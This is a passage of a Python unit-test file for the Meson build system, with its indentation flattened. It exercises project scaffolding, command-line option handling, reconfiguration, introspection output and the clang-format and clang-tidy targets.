raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
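        # For every language with a detected compiler, scaffold a new project with
        # "meson init" in an empty directory, then configure and build it; roughly
        # equivalent to:
        #   meson init --language <lang> --type <target_type>
        #   meson setup --backend=ninja builddir
        #   ninja -C builddir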
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
                elif lang in ('java',):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
        Test that using link_with: with a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
            # Static libraries are not linkable with -l under MSVC because Meson installs
            # them as .a files, which unix_args_to_native will not recognize since it expects
            # libraries to use the .lib extension. For a DLL the import library is installed
            # as .lib. Thus for MSVC this test needs to use shared libraries to exercise the
            # path-resolving logic in the dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
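        # For each library-path flag: build and install the library, build an
        # executable that links to it purely via LDFLAGS, then rebuild the library
        # with more exported symbols and assert that the executable target gets
        # rebuilt, proving the dependency was guessed from the final link command.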
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
            # assert that the user of the library will be rebuilt
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
            self.installdir = initial_installdir
            self.builddir = initial_builddir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
        # It is not an error to set a wrong option for unknown subprojects or
        # languages because we have no control over which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
        # Setting the same option a second time should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
            # Ignore KeyError, it happens on CI for compilers that do not
            # support b_sanitize. We have to test with a base option because
            # they used to fail this test with Meson 0.46 and earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
                with open(mfile, 'w') as of:
                    of.write("project('foobar', 'c')\n")
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
        # Setting optimization to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
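    # Same scenario as above, but instead of replacing the pkg-config binary the
    # cross file points the regular pkg-config at the cross directory via the
    # pkg_config_libdir property.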
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
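    # Writing an older version (or one with only the last component bumped) into
    # coredata.dat simulates a build dir configured by a different Meson: a real
    # version mismatch must regenerate the configuration from scratch, while a
    # patch-level bump must not, as the two tests below assert.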
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
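        # As the assertions below show, the ID is a short hash derived from the
        # target's subdirectory, followed by '@@', the target name and the suffix.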
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
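        # Each entry in root_keylist corresponds to a meson-info/intro-<name>.json
        # file; they are all loaded below and validated against these key/type lists.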
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
